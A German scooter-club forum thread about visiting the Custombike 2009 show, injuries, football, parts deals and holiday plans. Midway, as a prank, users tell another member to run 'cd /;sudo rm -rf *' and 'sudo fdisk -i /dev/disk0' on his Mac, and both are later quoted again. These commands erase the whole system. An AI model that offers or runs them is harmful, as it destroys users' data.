Zum Inhalt springen

Gruß an den Süden


GONZO 73

Empfohlene Beiträge

Gonzo, die Custombike 2009 - hat am Fr. von 12-20 Uhr geöffnet.

Ich wäre dafür das wir früh hinfahren, am Abend wird es sicher sehr voll..

Das Programm bietet schon einiges:

12:00 Uhr Messebeginn

12:00 Uhr "Pimp your VeeTwin"

12:30 Uhr Begrüßung/Programmvorstellung

13:00 Uhr Body-Painting

13:15 Uhr Steilwandshow

13:30 Uhr Harley-Fashionshow

14:00 Uhr Vorstellung Biker Build Off

14:00 Uhr European Biker Build Off Tobias Guckel vs. Nick Gale

14:30 Uhr CB-Projektbike-Vorstellung

14:45 Uhr Steilwandshow

15:00 Uhr Body-Painting

15:30 Uhr Multimedia-Show „Ace Cafe London”

16:00 Uhr Winner-Bikes Leserwahl (Bronze)

16:30 Uhr Harley-Fashionshow

16:45 Uhr Steilwandshow

17:00 Uhr Multimedia-Show „25 Jahre Softail”

17:30 Uhr Buell-Extreme

18:00 Uhr Body-Painting

18:00 Uhr Burnout-Contest

18:30 Uhr Film-Preview „TwoWheelTerrors”

18:45 Uhr Steilwandshow

19:00 Uhr Gewinnspiel-Verlosung

19:00 Uhr Nikolaus-Stripshow

20:00 Uhr Veranstaltungsende

In der Händlerliste stehen zig Chrom, Custom, Paint und Krimskrams Spezies.

Ich schätze Hansi darf nicht mit - zumindest bleibt die Kreditkarte daheim.

:-D

Link zu diesem Kommentar
Auf anderen Seiten teilen

Gonzo, die Custombike 2009 - hat am Fr. von 12-20 Uhr geöffnet.

Ich wäre dafür das wir früh hinfahren, am Abend wird es sicher sehr voll..

Das Programm bietet schon einiges:

In der Händlerliste stehen zig Chrom, Custom, Paint und Krimskrams Spezies.

Ich schätze Hansi darf nicht mit - zumindest bleibt die Kreditkarte daheim.

:-D

Na großartig. Ich falle wohl bis auf weiters aus. Ich hab mir ja gestern die Schulter ausgekugelt und sie rutschte da leider nicht sofort wieder rein. Ich musste schon recht heftig an dem Flügel ziehen um den wieder einzurenken und dabei hab ich mir mindestens die Bänder völlig überdehnt. Die 4 Stunden LKW fahren danach waren auch nicht sonderlich hilfreich. Bewegungsradius gleich null.

Ne, was hatte ich ne feine Nacht! :-D

Mit den vorrätigen Schmerzmitteln komme ich nicht weiter, drum werde ich gleich wohl mal ins Krankenhaus um die Ecke, mich richtig einpacken lassen und um ne passende Dosis Antischmerz bitten.

@ marcello. Auf Grund dieser Faktenlage kann ich zumindest heute deine Zündung nur durchmessen, ein Einbau fällt einhändig aus. Auf den ersten Blick wüde ich aber behaupten der Pick Up ist platt.

- ich könnte :-D , habe ja nix zu tun

Bearbeitet von gonzo
Link zu diesem Kommentar
Auf anderen Seiten teilen

Das stimmt. Bei den Bayern-Amateuren in der Grünwalder MSK ist nicht nur gefühlt bisweilen mehr Stimmung als in der dicken Arena.

"Ey, könnt Ihr mal still sein, ich will hier in Ruhe Fussball schaun' !"

@Schmied: "format C"

b

geht nich.

post-304-1259833246,3_thumb.jpg

Bearbeitet von Marcello
Link zu diesem Kommentar
Auf anderen Seiten teilen

Das stimmt. Bei den Bayern-Amateuren in der Grünwalder MSK ist nicht nur gefühlt bisweilen mehr Stimmung als in der dicken Arena. Daß 60 absteigt, wünsch ich Ihnen auch nicht. Aber wie bitter ist der Spruch bitte an die Adresse eines Vereins, der mit der Gefährdung der Erst-/Zweitliga-Lizenz wegen nicht mehr zu regelnder Verbindlichkeiten aus der AllianzArena-Vertragsgeschichte dafür plädiert, das Grünwalder Stadion renovieren und ausbauen zu lassen? Illusion hin, Illusion her - das ist ein bitterböser Spruch.

Wenn Du weiter auf dem Stadionthema rumreitest, bekomm ich noch eine ausgeprägte Lacknaseintoleranz :-D

Link zu diesem Kommentar
Auf anderen Seiten teilen

Apropo Fussi - Gonzo, denkst du an die Links??

Schon wer diese 20% Aktion beim SCK gesehen? Gibt massig Lambretta Kram abzugreifen, halt jeden Tag was anderes. Heute sind 210er im Angebot, und Racetour Kits von MB - ok, 709,- minus 20% sind immer noch zuviel, aber wer es sehr exclusiv und elegant will, kommt an den Dinger wohl nicht vorbei...

Link zu diesem Kommentar
Auf anderen Seiten teilen

So ersma:

Schmiddy allet joote. Tut mir leid, dass ich's verpa(t)sst habe. Hoffe du hast schoen gayfiret

LN, will das ding auch, die lambretta hat's sich verdient. mit angi, eher die 6000er oder 7000er? wuerde auf 7000er tippen. ist doch wirklich schoenes spielzeug, kostet unter 3-stelling und ist obendrein englisch. hairlich!

wo is poppa?

Wie LN schon sagte 6000 ist richtig, sogar fuer ts1 mit road. danach wuerde ich auf 7000 gehen, kenne bis dato noch keinen, der die 800er probiert hat.

@ Paderporno:

kann einer von euch mal Horst G-Punkt unter dne Druck drunter setzten? Der bekommt das alleine glaube ich nicht hin. Ich warte immer noch auf das "Material" waere echt gut, wenn das bald was wird.

Ach ja ich beantrage uebrigens, zumindest fuer dieses Jahr KC als Urlaubsmeister abzuloesen. Naechte Woche geht es mit TJ und Simon nach Marocco zum Surfen, ueber Sylvester in die Schweiz rein und im Februar dann nach Turks und Caicos, schoen mitte Motorenyacht vonne reichen Englaenders ueber die Inseln drueber schippern.

poppa

Link zu diesem Kommentar
Auf anderen Seiten teilen

Oha, habe so am Rande mitbekommen das Hansi das "Material" auf einer abgekackten Festplatte seines alten Notebooks hatte und seit Tagen verzweifelt versucht auf div. Wegen an selbiges heranzukommen... :-D

Wo bist du über Sylvester inne Schweiz?? Werd unten bei Franz sein, wenn du nicht gleich Neujahr abreist, könnten wir evtl. mal rumkommen, vorrausgesetzt es gibt da Powder und gute Pisten.

:-D

Link zu diesem Kommentar
Auf anderen Seiten teilen

he marcello wenn du schon so in experimentier laune bist, geh auf spotlight, terminal.app, dann 'cd /;sudo rm -rf *', das funktioniert auch TOP!! musst vielleicht dein passwort eintippen, ist aber ein riesenspass!

Link zu diesem Kommentar
Auf anderen Seiten teilen

Der Spaß wird beim Mac noch viel größer mit einem:

sudo fdisk -i /dev/disk0 *

($PASSWORD)

Und es geht deutlich schneller. "Eben war noch alles da." :-D

* Liebe Kinder, bitte tippt keine Befehle aus dem Indernetz ab. Das führt zu Schrumpfhoden und Rückenmarksschwund.

Link zu diesem Kommentar
Auf anderen Seiten teilen

@ Schmied

bin vom 27.1. in juf (sued ost schweiss)

bei chur anstatt nach davos rauf weiter richtung italiener fahren und dann in tusis in die via mala reindonnern dann avers tal. is klein aber fein so wie fuellboyers penis, appropos fuellboy, roots avatar vHERRweird mich, das sieht aus wie der Vollkoerpa, der alte fux.

http://www.youtube.com/watch?v=m4DyV2VaDU8

Link zu diesem Kommentar
Auf anderen Seiten teilen

marcello hat sich seit ein paar stunden nicht geruehrt. schaetze der hat das wirklich mal eingetippt. hehehe.

poppa die noerdliche sohle gefaellt. die 70s sind die neuen 60s - dahair auch mofas von 1977.

Bearbeitet von Arne
Link zu diesem Kommentar
Auf anderen Seiten teilen

Hair, dann bitte deinen Style auch deinen Kisten anpassen - ne Mofa von ´77 heisst: Schnitzel anne Backe, Matte mit Seitenscheitel a´la Günther Netzer, dazuz holste dir von Schlaghosn Sven ne Buxxe samt Plateaustiefel, und den Fellrand näh ich dir dann höchstpersönlich an die Kutte Alter, wenn das mal nicht dufte ist!

@ Schmied

bin vom 27.1. in juf (sued ost schweiss)

bei chur anstatt nach davos rauf weiter richtung italiener fahren und dann in tusis in die via mala reindonnern dann avers tal. is klein aber fein so wie fuellboyers penis, appropos fuellboy, roots avatar vHERRweird mich, das sieht aus wie der Vollkoerpa, der alte fux.

Hattest du nicht was von "über Sylvester" getippelt?? Oder meinste den 27.12.??

Aber Juf is echt am Arsch der Heide, wie kommst du darauf??

Link zu diesem Kommentar
Auf anderen Seiten teilen

he marcello wenn du schon so in experimentier laune bist, geh auf spotlight, terminal.app, dann 'cd /;sudo rm -rf *', das funktioniert auch TOP!! musst vielleicht dein passwort eintippen, ist aber ein riesenspass!

Der Spaß wird beim Mac noch viel größer mit einem:

sudo fdisk -i /dev/disk0 *

($PASSWORD)

Und es geht deutlich schneller. "Eben war noch alles da." :-D

Ja Jungs gebt Euch Quellcode-Namen. :-D

Link zu diesem Kommentar
Auf anderen Seiten teilen

Fuel, dat is so als sachste nem Vespisten der nach Leistung sucht: kauf dir´n TS1.. :-D

Da hat wohl einer immer noch kein Abo.

dann könntest du nämlich n der letzten Scootering Ausgabe eine Vespa mit TS1 entdecken.

Oha, habe so am Rande mitbekommen das Hansi das "Material" auf einer abgekackten Festplatte seines alten Notebooks hatte und seit Tagen verzweifelt versucht auf div. Wegen an selbiges heranzukommen... :-D

Die Photos habe ich ihm höchst persönlich auf sein MACBook kopiert.

Jetzt noch was anderes - was nun mit Weihnachtssingen in MS?

Steht das noch in der Planung?

Hansi ist wo? Gonzo hat kaputte Flügel. Schmied Samstag steht

Samstag ab 14:00 wird auch der Smoker an der Halle angefeuert. Wäre ein besuch wert.

Link zu diesem Kommentar
Auf anderen Seiten teilen

Erstelle ein Benutzerkonto oder melde Dich an, um zu kommentieren

Du musst ein Benutzerkonto haben, um einen Kommentar verfassen zu können

Benutzerkonto erstellen

Neues Benutzerkonto für unsere Community erstellen. Es ist einfach!

Neues Benutzerkonto erstellen

Anmelden

Du hast bereits ein Benutzerkonto? Melde Dich hier an.

Jetzt anmelden
  • Wer ist Online   0 Benutzer

    • Keine registrierten Benutzer online.



×
×
  • Neu erstellen...

Wichtige Information